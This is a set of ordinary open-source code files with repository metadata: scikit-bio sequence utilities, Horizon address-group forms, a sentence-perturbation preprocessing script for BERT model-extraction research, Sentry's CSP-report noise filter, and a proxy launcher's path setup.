def distance(self, other, metric=None):
"""Compute the distance to another sequence.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compute the distance to.
metric : function, optional
Function used to compute the distance between the biological
sequence and `other`. If ``None`` (the default),
``scipy.spatial.distance.hamming`` will be used. This function
should take two ``skbio.Sequence`` objects and return a ``float``.
Returns
-------
float
Distance between the biological sequence and `other`.
Raises
------
ValueError
If the sequences are not the same length when `metric` is ``None``
(i.e., `metric` is ``scipy.spatial.distance.hamming``). This is
only checked when using this metric, as equal length is not a
requirement of all sequence distance metrics. In general, the
metric itself should test and give an informative error message,
but the message from ``scipy.spatial.distance.hamming`` is somewhat
cryptic (as of this writing), and it's the default metric, so we
explicitly do this check here. This metric-specific check will be
removed from this method when the ``skbio.sequence.stats`` module
is created (track progress on issue #913).
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
fraction_diff
fraction_same
scipy.spatial.distance.hamming
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('AGUC')
>>> s.distance(t)
0.25
>>> def custom_dist(s1, s2): return 0.42
>>> s.distance(t, custom_dist)
0.42
"""
# TODO refactor this method to accept a name (string) of the distance
# metric to apply and accept **kwargs
other = self._munge_to_sequence(other, 'distance')
if metric is None:
return self._hamming(other)
return float(metric(self, other))
def _hamming(self, other):
# Hamming requires equal length sequences. We are checking this
# here because the error you would get otherwise is cryptic.
if len(self) != len(other):
raise ValueError(
"Sequences do not have equal length. "
"Hamming distances can only be computed between "
"sequences of equal length.")
return float(hamming(self.values, other.values))
@stable(as_of="0.4.0")
def matches(self, other):
"""Find positions that match with another sequence.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
Returns
-------
1D np.ndarray (bool)
Boolean vector where ``True`` at position ``i`` indicates a match
between the sequences at their positions ``i``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
mismatches
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('GAUU')
>>> s.matches(t)
array([ True, False, True, False], dtype=bool)
"""
other = self._munge_to_sequence(other, 'matches/mismatches')
if len(self) != len(other):
raise ValueError("Match and mismatch vectors can only be "
"generated from equal length sequences.")
return self._bytes == other._bytes
@stable(as_of="0.4.0")
def mismatches(self, other):
"""Find positions that do not match with another sequence.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
Returns
-------
1D np.ndarray (bool)
Boolean vector where ``True`` at position ``i`` indicates a
mismatch between the sequences at their positions ``i``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
matches
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('GAUU')
>>> s.mismatches(t)
array([False, True, False, True], dtype=bool)
"""
return np.invert(self.matches(other))
@stable(as_of="0.4.0")
def match_frequency(self, other, relative=False):
"""Return count of positions that are the same between two sequences.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
relative : bool, optional
If ``True``, return the relative frequency of matches instead of
the count.
Returns
-------
int or float
Number of positions that are the same between the sequences. This
will be an ``int`` if `relative` is ``False`` and a ``float``
if `relative` is ``True``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
mismatch_frequency
matches
mismatches
distance
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('AGUC')
>>> s.match_frequency(t)
3
>>> s.match_frequency(t, relative=True)
0.75
"""
if relative:
return float(self.matches(other).mean())
else:
return int(self.matches(other).sum())
@stable(as_of="0.4.0")
def mismatch_frequency(self, other, relative=False):
"""Return count of positions that differ between two sequences.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
relative : bool, optional
If ``True``, return the relative frequency of mismatches instead of
the count.
Returns
-------
int or float
Number of positions that differ between the sequences. This will be
an ``int`` if `relative` is ``False`` and a ``float``
if `relative` is ``True``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
match_frequency
matches
mismatches
distance
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('AGUC')
>>> s.mismatch_frequency(t)
1
>>> s.mismatch_frequency(t, relative=True)
0.25
"""
if relative:
return float(self.mismatches(other).mean())
else:
return int(self.mismatches(other).sum())
@experimental(as_of="0.4.0-dev")
def frequencies(self, chars=None, relative=False):
"""Compute frequencies of characters in the sequence.
Parameters
----------
chars : str or set of str, optional
Characters to compute the frequencies of. May be a ``str``
containing a single character or a ``set`` of single-character
strings. If ``None``, frequencies will be computed for all
characters present in the sequence.
relative : bool, optional
If ``True``, return the relative frequency of each character
instead of its count. If `chars` is provided, relative frequencies
will be computed with respect to the number of characters in the
sequence, **not** the total count of characters observed in
`chars`. Thus, the relative frequencies will not necessarily sum to
1.0 if `chars` is provided.
Returns
-------
dict
Frequencies of characters in the sequence.
Raises
------
TypeError
If `chars` is not a ``str`` or ``set`` of ``str``.
ValueError
If `chars` is not a single-character ``str`` or a ``set`` of
single-character strings.
ValueError
If `chars` contains characters outside the allowable range of
characters in a ``Sequence`` object.
See Also
--------
kmer_frequencies
iter_kmers
Notes
-----
If the sequence is empty (i.e., length zero), ``relative=True``,
**and** `chars` is provided, the relative frequency of each specified
character will be ``np.nan``.
If `chars` is not provided, this method is equivalent to, but faster
than, ``seq.kmer_frequencies(k=1)``.
If `chars` is not provided, it is equivalent to, but faster than,
passing ``chars=seq.observed_chars``.
Examples
--------
Compute character frequencies of a sequence:
>>> from pprint import pprint
>>> from skbio import Sequence
>>> seq = Sequence('AGAAGACC')
>>> freqs = seq.frequencies()
>>> pprint(freqs) # using pprint to display dict in sorted order
{'A': 4, 'C': 2, 'G': 2}
Compute relative character frequencies:
>>> freqs = seq.frequencies(relative=True)
>>> pprint(freqs)
{'A': 0.5, 'C': 0.25, 'G': 0.25}
Compute relative frequencies of characters A, C, and T:
>>> freqs = seq.frequencies(chars={'A', 'C', 'T'}, relative=True)
>>> pprint(freqs)
{'A': 0.5, 'C': 0.25, 'T': 0.0}
Note that since character T is not in the sequence we receive a
relative frequency of 0.0. The relative frequencies of A and C are
relative to the number of characters in the sequence (8), **not** the
number of A and C characters (4 + 2 = 6).
"""
freqs = np.bincount(self._bytes,
minlength=self._number_of_extended_ascii_codes)
if chars is not None:
chars, indices = self._chars_to_indices(chars)
else:
indices, = np.nonzero(freqs)
# Downcast from int64 to uint8 then convert to str. This is safe
# because we are guaranteed to have indices in the range 0 to 255
# inclusive.
chars = indices.astype(np.uint8).tostring().decode('ascii')
obs_counts = freqs[indices]
if relative:
obs_counts = obs_counts / len(self)
# Use tolist() for minor performance gain.
return dict(zip(chars, obs_counts.tolist()))
def _chars_to_indices(self, chars):
"""Helper for Sequence.frequencies."""
if isinstance(chars, six.string_types) or \
isinstance(chars, six.binary_type):
chars = set([chars])
elif not isinstance(chars, set):
raise TypeError(
"`chars` must be of type `set`, not %r" % type(chars).__name__)
# Impose an (arbitrary) ordering to `chars` so that we can return
# `indices` in that same order.
chars = list(chars)
indices = []
for char in chars:
if not (isinstance(char, six.string_types) or
isinstance(char, six.binary_type)):
raise TypeError(
"Each element of `chars` must be string-like, not %r" %
type(char).__name__)
if len(char) != 1:
raise ValueError(
"Each element of `chars` must contain a single "
"character (found %d characters)" % len(char))
index = ord(char)
if index >= self._number_of_extended_ascii_codes:
raise ValueError(
"Character %r in `chars` is outside the range of "
"allowable characters in a `Sequence` object." % char)
indices.append(index)
return chars, indices
@stable(as_of="0.4.0")
def iter_kmers(self, k, overlap=True):
"""Generate kmers of length `k` from the biological sequence.
Parameters
----------
k : int
The kmer length.
overlap : bool, optional
Defines whether the kmers should be overlapping or not.
Yields
------
Sequence
kmer of length `k` contained in the biological sequence.
Raises
------
ValueError
If `k` is less than 1.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACACGACGTT')
>>> for kmer in s.iter_kmers(4, overlap=False):
... str(kmer)
'ACAC'
'GACG'
>>> for kmer in s.iter_kmers(3, overlap=True):
... str(kmer)
'ACA'
'CAC'
'ACG'
'CGA'
'GAC'
'ACG'
'CGT'
'GTT'
"""
if k < 1:
raise ValueError("k must be greater than 0.")
if overlap:
step = 1
count = len(self) - k + 1
else:
step = k
count = len(self) // k
if self.has_positional_metadata():
for i in range(0, len(self) - k + 1, step):
yield self[i:i+k]
# Optimized path when no positional metadata
else:
kmers = np.lib.stride_tricks.as_strided(
self._bytes, shape=(k, count), strides=(1, step)).T
for s in kmers:
yield self._to(sequence=s)
@stable(as_of="0.4.0")
def kmer_frequencies(self, k, overlap=True, relative=False):
"""Return counts of words of length `k` from the biological sequence.
Parameters
----------
k : int
The word length.
overlap : bool, optional
Defines whether the kmers should be overlapping or not.
relative : bool, optional
If ``True``, return the relative frequency of each kmer instead of
its count.
Returns
-------
dict
Frequencies of words of length `k` contained in the biological
sequence.
Raises
------
ValueError
If `k` is less than 1.
Examples
--------
>>> from pprint import pprint
>>> from skbio import Sequence
>>> s = Sequence('ACACATTTATTA')
>>> freqs = s.kmer_frequencies(3, overlap=False)
>>> pprint(freqs) # using pprint to display dict in sorted order
{'ACA': 1, 'CAT': 1, 'TTA': 2}
>>> freqs = s.kmer_frequencies(3, relative=True, overlap=False)
>>> pprint(freqs)
{'ACA': 0.25, 'CAT': 0.25, 'TTA': 0.5}
"""
kmers = self.iter_kmers(k, overlap=overlap)
freqs = dict(collections.Counter((str(seq) for seq in kmers)))
if relative:
if overlap:
num_kmers = len(self) - k + 1
else:
num_kmers = len(self) // k
relative_freqs = {}
for kmer, count in viewitems(freqs):
relative_freqs[kmer] = count / num_kmers
freqs = relative_freqs
return freqs
@stable(as_of="0.4.0")
def find_with_regex(self, regex, ignore=None):
"""Generate slices for patterns matched by a regular expression.
Parameters
----------
regex : str or regular expression object
String to be compiled into a regular expression, or a pre-
compiled regular expression object (e.g., from calling
``re.compile``).
ignore : 1D array_like (bool) or iterable (slices or ints), optional
Indicate the positions to ignore when matching.
Yields
------
slice
Location where the regular expression matched.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('AATATACCGGTTATAA')
>>> for match in s.find_with_regex('(TATA+)'):
... match
... str(s[match])
slice(2, 6, None)
'TATA'
slice(11, 16, None)
'TATAA'
"""
if isinstance(regex, six.string_types):
regex = re.compile(regex)
lookup = np.arange(len(self))
if ignore is None:
string = str(self)
else:
ignore = self._munge_to_index_array(ignore)
lookup = np.delete(lookup, ignore)
string = str(self[lookup])
for match in regex.finditer(string):
# We start at 1 because we don't want the group that contains all
# other groups.
for g in range(1, len(match.groups())+1):
yield slice(lookup[match.start(g)],
lookup[match.end(g) - 1] + 1)
@stable(as_of="0.4.0")
def iter_contiguous(self, included, min_length=1, invert=False):
"""Yield contiguous subsequences based on `included`.
Parameters
----------
included : 1D array_like (bool) or iterable (slices or ints)
`included` is transformed into a flat boolean vector where each
position will either be included or skipped. All contiguous
included positions will be yielded as a single region.
min_length : int, optional
The minimum length of a subsequence for it to be yielded.
Default is 1.
invert : bool, optional
Whether to invert `included` such that it describes what should be
skipped instead of included. Default is False.
Yields
------
Sequence
Contiguous subsequence as indicated by `included`.
Notes
-----
If slices provide adjacent ranges, then they will be considered the
same contiguous subsequence.
Examples
--------
Here we use `iter_contiguous` to find all of the contiguous ungapped
sequences using a boolean vector derived from our DNA sequence.
>>> from skbio import DNA
>>> s = DNA('AAA--TT-CCCC-G-')
>>> no_gaps = ~s.gaps()
>>> for ungapped_subsequence in s.iter_contiguous(no_gaps,
... min_length=2):
... print(ungapped_subsequence)
AAA
TT
CCCC
Note how the last potential subsequence was skipped because it would
have been smaller than our `min_length` which was set to 2.
We can also use `iter_contiguous` on a generator of slices as is
produced by `find_motifs` (and `find_with_regex`).
>>> from skbio import Protein
>>> s = Protein('ACDFNASANFTACGNPNRTESL')
>>> for subseq in s.iter_contiguous(s.find_motifs('N-glycosylation')):
... print(subseq)
NASANFTA
NRTE
Note how the first subsequence contains two N-glycosylation sites. This
happened because they were contiguous.
"""
idx = self._munge_to_index_array(included)
if invert:
idx = np.delete(np.arange(len(self)), idx)
# Adapted from http://stackoverflow.com/a/7353335/579416
for contig in np.split(idx, np.where(np.diff(idx) != 1)[0] + 1):
r = self[contig]
if len(r) >= min_length:
yield r
def _to(self, sequence=None, metadata=None, positional_metadata=None):
"""Return a copy of the current biological sequence.
Returns a copy of the current biological sequence, optionally with
updated attributes specified as keyword arguments.
Arguments are the same as those passed to the ``Sequence`` constructor.
The returned copy will have its attributes updated based on the
arguments. If an attribute is missing, the copy will keep the same
attribute as the current biological sequence. Valid attribute names
are `'sequence'`, `'metadata'`, and `'positional_metadata'`. Default
behavior is to return a copy of the current biological sequence
without changing any attributes.
Parameters
----------
sequence : optional
metadata : optional
positional_metadata : optional
Returns
-------
Sequence
Copy of the current biological sequence, optionally with updated
attributes based on arguments. Will be the same type as the current
biological sequence (`self`).
Notes
-----
By default, `metadata` and `positional_metadata` are shallow-copied and
the reference to `sequence` is used (without copying) for efficiency
since `sequence` is immutable. This differs from the behavior of
`Sequence.copy`, which will actually copy `sequence`.
This method is the preferred way of creating new instances from an
existing biological sequence, instead of calling
``self.__class__(...)``, as the latter can be error-prone (e.g.,
it's easy to forget to propagate attributes to the new instance).
"""
if sequence is None:
sequence = self._bytes
if metadata is None and self.has_metadata():
metadata = self._metadata
if positional_metadata is None and self.has_positional_metadata():
positional_metadata = self._positional_metadata
return self._constructor(sequence=sequence, metadata=metadata,
positional_metadata=positional_metadata)
def _constructor(self, **kwargs):
return self.__class__(**kwargs)
    def _munge_to_index_array(self, sliceable):
        """Return an index array from something isomorphic to a boolean vector.

        Accepts a positional-metadata column name (must be a boolean
        column), a boolean vector the same length as the sequence, or an
        iterable of ints/slices. Returns a sorted 1D integer array of
        positions. Iterables of ints/slices must be non-overlapping and in
        ascending order.
        """
        # A string names a boolean column in the positional metadata.
        if isinstance(sliceable, six.string_types):
            if sliceable in self.positional_metadata:
                if self.positional_metadata[sliceable].dtype == np.bool:
                    sliceable = self.positional_metadata[sliceable]
                else:
                    raise TypeError("Column '%s' in positional metadata does "
                                    "not correspond to a boolean vector" %
                                    sliceable)
            else:
                raise ValueError("No positional metadata associated with key "
                                 "'%s'" % sliceable)
        # Anything without a real dtype (plain iterables, object arrays) is
        # inspected element-by-element: it must be all-bool or all-int/slice,
        # never a mix, before being packed into an ndarray via np.r_.
        if not hasattr(sliceable, 'dtype') or (hasattr(sliceable, 'dtype') and
                                               sliceable.dtype == 'object'):
            sliceable = tuple(sliceable)
            bool_mode = False
            int_mode = False
            for s in sliceable:
                if isinstance(s, (bool, np.bool_)):
                    bool_mode = True
                elif isinstance(s, (slice, int, np.signedinteger)) or (
                        hasattr(s, 'dtype') and s.dtype != np.bool):
                    int_mode = True
                else:
                    raise TypeError("Invalid type in iterable: %s, must be one"
                                    " of {bool, int, slice, np.signedinteger}"
                                    % s.__class__.__name__)
            if bool_mode and int_mode:
                raise TypeError("Cannot provide iterable of both bool and"
                                " int.")
            # np.r_ concatenates ints and slices into one index array.
            sliceable = np.r_[sliceable]
        if sliceable.dtype == np.bool:
            # Boolean mask: must match the sequence length; np.where turns
            # it into the positions of the True entries.
            if sliceable.size != len(self):
                raise ValueError("Boolean array (%d) does not match length of"
                                 " sequence (%d)."
                                 % (sliceable.size, len(self)))
            normalized, = np.where(sliceable)
        else:
            # Integer indices: bincount counts how often each position is
            # named, which detects overlaps (count > 1) and, after mapping
            # back through np.where, out-of-order input.
            normalized = np.bincount(sliceable)
            if np.any(normalized > 1):
                raise ValueError("Overlapping index regions are not allowed.")
            normalized, = np.where(normalized)
            if np.any(normalized != sliceable):
                raise ValueError("Index regions are out of order.")
        return normalized
def _munge_to_sequence(self, other, method):
if isinstance(other, Sequence):
if type(other) != type(self):
raise TypeError("Cannot use %s and %s together with `%s`" %
(self.__class__.__name__,
other.__class__.__name__, method))
else:
return other
# We don't use self.__class__ or self._constructor here because we want
# to construct the most general type of Sequence object in order to
# avoid validation errors.
return Sequence(other)
def _munge_to_bytestring(self, other, method):
if type(other) is bytes:
return other
elif isinstance(other, six.string_types):
return other.encode('ascii')
else:
return self._munge_to_sequence(other, method)._string
@contextmanager
def _byte_ownership(self):
if not self._owns_bytes:
self._bytes = self._bytes.copy()
self._owns_bytes = True
self._bytes.flags.writeable = True
yield
self._bytes.flags.writeable = False
def _single_index_to_slice(start_index):
end_index = None if start_index == -1 else start_index+1
return slice(start_index, end_index)
def _is_single_index(index):
return (isinstance(index, numbers.Integral) and
not isinstance(index, bool))
def _as_slice_if_single_index(indexable):
    """Normalize a bare integer index to a slice; pass anything else through."""
    return (_single_index_to_slice(indexable)
            if _is_single_index(indexable) else indexable)
def _slices_from_iter(array, indexables):
    """Yield pieces of *array*, one per slice or single index in *indexables*.

    Raises IndexError for any element that is neither a slice nor an
    integral index.
    """
    for indexable in indexables:
        if _is_single_index(indexable):
            indexable = _single_index_to_slice(indexable)
        elif not isinstance(indexable, slice):
            raise IndexError("Cannot slice sequence from iterable "
                             "containing %r." % indexable)
        yield array[indexable]
|
{
"content_hash": "f7d235fc4a5ccce3405fe8e901eebdc0",
"timestamp": "",
"source": "github",
"line_count": 2453,
"max_line_length": 79,
"avg_line_length": 32.657969832857724,
"alnum_prop": 0.5366620896267632,
"repo_name": "jdrudolph/scikit-bio",
"id": "44a8674bcd34bdf1c69581b476e4af1386f00ab6",
"size": "80464",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "skbio/sequence/_sequence.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "39087"
},
{
"name": "CSS",
"bytes": "4379"
},
{
"name": "Groff",
"bytes": "259"
},
{
"name": "Makefile",
"bytes": "1054"
},
{
"name": "Python",
"bytes": "2265718"
}
],
"symlink_target": ""
}
|
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from akanda.horizon.api import neutron_extensions_client
from akanda.horizon.tabs import alias_tab_redirect
class BaseHostAliasForm(forms.SelfHandlingForm):
    """
    Common fields shared by the create/edit host-alias (address group) forms.
    """
    # Hidden primary key; empty when creating a new alias, populated on edit.
    id = forms.CharField(
        label=_("Id"), widget=forms.HiddenInput, required=False)
    # Display name of the address group.
    name = forms.CharField(label=_("Name"), max_length=255)
class CreateHostAliasForm(BaseHostAliasForm):
    """
    Form that creates a new host-alias (address group) via the Neutron
    extensions client, reporting success or failure to the user.
    """
    def handle(self, request, data):
        """Create the address group; on failure redirect back to the tab."""
        try:
            result = self._create_host_alias(request, data)
            messages.success(
                request,
                _('Successfully created Address Group: %s') % data['name'])
            return result
        # Was a bare ``except:``, which also swallows SystemExit and
        # KeyboardInterrupt; only real errors should become a redirect.
        except Exception:
            redirect = "%s?tab=%s" % (
                reverse("horizon:project:networking:index"),
                alias_tab_redirect())
            exceptions.handle(request, _('Unable to create Address Group.'),
                              redirect=redirect)
    def _create_host_alias(self, request, data):
        """Call the Neutron extension API to create the address group."""
        return neutron_extensions_client.addressgroup_create(request, data)
class EditHostAliasForm(BaseHostAliasForm):
    """
    Form that updates an existing host-alias (address group) via the Neutron
    extensions client, reporting success or failure to the user.
    """
    def handle(self, request, data):
        """Update the address group; on failure redirect back to the tab."""
        try:
            self._update_host_alias(request, data)
            messages.success(
                request,
                _('Successfully updated Address Group: %s') % data['name'])
            return data
        # Was a bare ``except:``, which also swallows SystemExit and
        # KeyboardInterrupt; only real errors should become a redirect.
        except Exception:
            redirect = "%s?tab=%s" % (
                reverse("horizon:project:networking:index"),
                alias_tab_redirect())
            exceptions.handle(request, _('Unable to update Address Group.'),
                              redirect=redirect)
    def _update_host_alias(self, request, data):
        """Call the Neutron extension API to update the address group."""
        return neutron_extensions_client.addressgroup_update(request, data)
|
{
"content_hash": "f124933e29d610311181ca7c6507e428",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 76,
"avg_line_length": 33.40677966101695,
"alnum_prop": 0.602232369355657,
"repo_name": "dreamhost/akanda-horizon",
"id": "d25dfb5ee087c9d4216ce16a40f53410de2a8124",
"size": "2579",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "akanda/horizon/alias/forms/hosts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "151"
},
{
"name": "JavaScript",
"bytes": "122"
},
{
"name": "Python",
"bytes": "141454"
}
],
"symlink_target": ""
}
|
"""Preprocess the input to include sentences with edit distance one."""
import collections
import random
import tensorflow.compat.v1 as tf
# Short aliases into the TF compat v1 namespace used throughout this script.
app = tf.app
flags = tf.flags
gfile = tf.gfile
logging = tf.logging
# Command-line flags. NOTE: "pertubations" (sic) is the public flag name, so
# the misspelling cannot be fixed without breaking existing invocations.
flags.DEFINE_string("input_path", None, "Path containing sentence data")
flags.DEFINE_integer("num_pertubations", 1, "Number of random flips to be made")
flags.DEFINE_float("fraction", 1, "What fraction of data should be used")
flags.DEFINE_integer("random_seed", 42, "")
flags.DEFINE_bool("keep_only_original", False,
                  "Should only original subset be preserved")
flags.DEFINE_bool("export_other", False, "Export the other fraction of data")
flags.DEFINE_string("output_path", None, "Output path for preprocessed data")
FLAGS = flags.FLAGS
def build_vocab(sents_data):
  """Return the unique words of the first tab-field of each line.

  Order is first-occurrence order, matching insertion order of the dict.
  """
  seen = {}
  for line in sents_data:
    # Only the sentence itself (text before the first tab) contributes words.
    for token in line.split("\t")[0].split():
      seen[token] = 1
  return list(seen)
def build_subset(sents_data):
  """Shuffle *sents_data* in place and return the configured fraction of it.

  NOTE: the shuffle mutates the caller's list. With --export_other the
  complement of the fraction is returned instead of the fraction itself.
  """
  cutoff = int(FLAGS.fraction * len(sents_data))
  random.shuffle(sents_data)
  return sents_data[cutoff:] if FLAGS.export_other else sents_data[:cutoff]
def main(_):
  """Read the TSV dataset, add randomly perturbed sentences, write it back."""
  random.seed(FLAGS.random_seed)
  with gfile.Open(FLAGS.input_path, "r") as f:
    sents_data = f.read().strip().split("\n")
  # First line is a header; the rest are "sentence\t<other fields>" rows.
  header = sents_data[0]
  sents_data = sents_data[1:]
  # Ordering matters: the vocabulary is built from the FULL dataset before
  # build_subset shuffles sents_data in place and takes the fraction.
  vocab = build_vocab(sents_data)
  subset_sents_data = build_subset(sents_data)
  output_data = []
  for sent in subset_sents_data:
    output_data.append(sent)
    data_point_parts = sent.split("\t")
    original_sent = data_point_parts[0].split()
    # With --keep_only_original, keep the subset rows but add no variants.
    if FLAGS.keep_only_original:
      continue
    # For each perturbation, copy the sentence and replace one random word
    # with a random vocabulary word (edit distance one at the word level).
    for _ in range(FLAGS.num_pertubations):
      pertubed = list(original_sent)
      pertubed[random.randint(0, len(original_sent) - 1)] = random.choice(vocab)
      output_data.append(" ".join(pertubed) + " \t" +
                         "\t".join(data_point_parts[1:]))
  output_data = [header] + output_data
  with gfile.Open(FLAGS.output_path, "w") as f:
    f.write("\n".join(output_data) + "\n")
  return
if __name__ == "__main__":
  # tf.app.run parses the flags defined above, then calls main().
  app.run(main)
|
{
"content_hash": "ab625b1aaf5ea2814f871cb2514f03c1",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 80,
"avg_line_length": 28.42168674698795,
"alnum_prop": 0.6748622297583722,
"repo_name": "google-research/language",
"id": "c75e20e24e03956a45d1dbb13d4a3a672ae7e0db",
"size": "2974",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "language/bert_extraction/steal_bert_classifier/data_generation/preprocess_edit_distance_one.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "9834"
},
{
"name": "CSS",
"bytes": "602"
},
{
"name": "HTML",
"bytes": "25162"
},
{
"name": "JavaScript",
"bytes": "8857"
},
{
"name": "Jupyter Notebook",
"bytes": "1505066"
},
{
"name": "Python",
"bytes": "7139472"
},
{
"name": "Shell",
"bytes": "183709"
}
],
"symlink_target": ""
}
|
"""
sentry.utils.csp
~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from sentry.utils.http import is_valid_origin
# Default block list sourced from personal experience as well as
# reputable blogs from Twitter and Dropbox
# Sources whose CSP violation reports are pure noise (browser extensions,
# ad/malware injectors, etc.) and should be discarded by default.
DISALLOWED_SOURCES = (
    'chrome://*',
    'chrome-extension://*',
    # BUG FIX: a missing trailing comma here used to implicitly concatenate
    # this literal with the next one into the single bogus entry
    # 'chromeinvokeimmediate://*chromenull://*', so neither pattern matched.
    'chromeinvokeimmediate://*',
    'chromenull://*',
    'safari-extension://*',
    'mxaddon-pkg://*',
    'jar://*',
    'webviewprogressproxy://*',
    'tmtbff://*',
    'mbinit://*',
    'symres://*',
    'resource://*',
    '*.metrext.com',
    'static.image2play.com',
    '*.tlscdn.com',
    '73a5b0806e464be8bd4e694c744624f0.com',
    '020dfefc4ac745dab7594f2f771c1ded.com',
    '*.superfish.com',
    'addons.mozilla.org',
    'v.zilionfast.in',
    'widgets.amung.us',
    'xls.searchfun.in',
    'istatic.datafastguru.info',
    'localhost',
    'resultshub-a.akamaihd.net',
    'pulseadnetwork.com',
    'gateway.zscalertwo.net',
    'www.passpack.com',
    'middlerush-a.akamaihd.net',
    'www.websmartcenter.com',
    'a.linkluster.com',
    'saveyoutime.ru',
    'cdncache-a.akamaihd.net',
    'x.rafomedia.com',
    'savingsslider-a.akamaihd.net',
    'injections.adguard.com',
    'icontent.us',
    'amiok.org',
    'connectionstrenth.com',
    'siteheart.net',
)
# CSP directives Sentry accepts in violation reports; reports whose
# effective_directive is not in this set are rejected as noise
# (see is_valid_csp_report below).
ALLOWED_DIRECTIVES = frozenset((
    'base-uri', 'child-src', 'connect-src', 'default-src',
    'font-src', 'form-action', 'frame-ancestors',
    'img-src', 'manifest-src', 'media-src', 'object-src',
    'plugin-types', 'referrer', 'script-src', 'style-src',
    'upgrade-insecure-requests',

    # Deprecated directives
    # > Note: This directive is deprecated. Use child-src instead.
    # > https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives#frame-src
    # 'frame-src',

    # I don't really know what this even is.
    # 'sandbox',
))
# blocked-uri values that are pure noise and will never be actionable
# (e.g. Chrome 45/46 report just 'about' for some blocks).
DISALLOWED_BLOCKED_URIS = frozenset((
    'about',
    'ms-browser-extension',
))
def is_valid_csp_report(report, project=None):
    """Return True if a CSP violation *report* looks actionable.

    Filters out unknown directives, known-noise blocked URIs, reports with
    neither a blocked URI nor a source file, and reports originating from
    the (project-configurable) disallowed source list.
    """
    if report.get('effective_directive') not in ALLOWED_DIRECTIVES:
        return False
    blocked_uri = report.get('blocked_uri')
    # Some Chrome versions (observed in 45/46) report blocked-uri as just
    # 'about' — not actionable, just noisy.
    if blocked_uri in DISALLOWED_BLOCKED_URIS:
        return False
    source_file = report.get('source_file')
    # Without either URI there is nothing sensible to do with the report.
    if not (blocked_uri or source_file):
        return False
    use_defaults = project is None or bool(
        project.get_option('sentry:csp_ignored_sources_defaults', True))
    disallowed_sources = DISALLOWED_SOURCES if use_defaults else ()
    if project is not None:
        disallowed_sources += tuple(
            project.get_option('sentry:csp_ignored_sources', []))
    if not disallowed_sources:
        return True
    # Reject the report if either URI matches a disallowed source.
    for uri in (source_file, blocked_uri):
        if uri and is_valid_origin(uri, allowed=disallowed_sources):
            return False
    return True
|
{
"content_hash": "9391d8cdf536e3e8424efdfe8c83b0be",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 97,
"avg_line_length": 28.495726495726494,
"alnum_prop": 0.6484703059388123,
"repo_name": "JackDanger/sentry",
"id": "ff8d8ddf5c6d667a66436238504dc9829d484664",
"size": "3334",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/sentry/utils/csp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "583430"
},
{
"name": "HTML",
"bytes": "319622"
},
{
"name": "JavaScript",
"bytes": "624672"
},
{
"name": "Makefile",
"bytes": "2660"
},
{
"name": "Python",
"bytes": "6279717"
}
],
"symlink_target": ""
}
|
__version__ = '3.2.3'

import os
import sys
import sysconfig
import platform

#reload(sys).setdefaultencoding('UTF-8')
sys.dont_write_bytecode = True

# Extend sys.path with the bundled python27 library directories that ship
# alongside this script: always the 'noarch' libs, plus a platform-specific
# directory chosen from the current sys.platform.
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir))
python_path = os.path.join(root_path, 'python27', '1.0')

noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)

if sys.platform == "win32":
    win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
    sys.path.append(win32_lib)
elif sys.platform == "linux" or sys.platform == "linux2":
    linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
    sys.path.append(linux_lib)
elif sys.platform == "darwin":
    darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
    sys.path.append(darwin_lib)
    # macOS system Python keeps some extra packages outside the default path.
    extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
    sys.path.append(extra_lib)
from cert_util import CertUtil

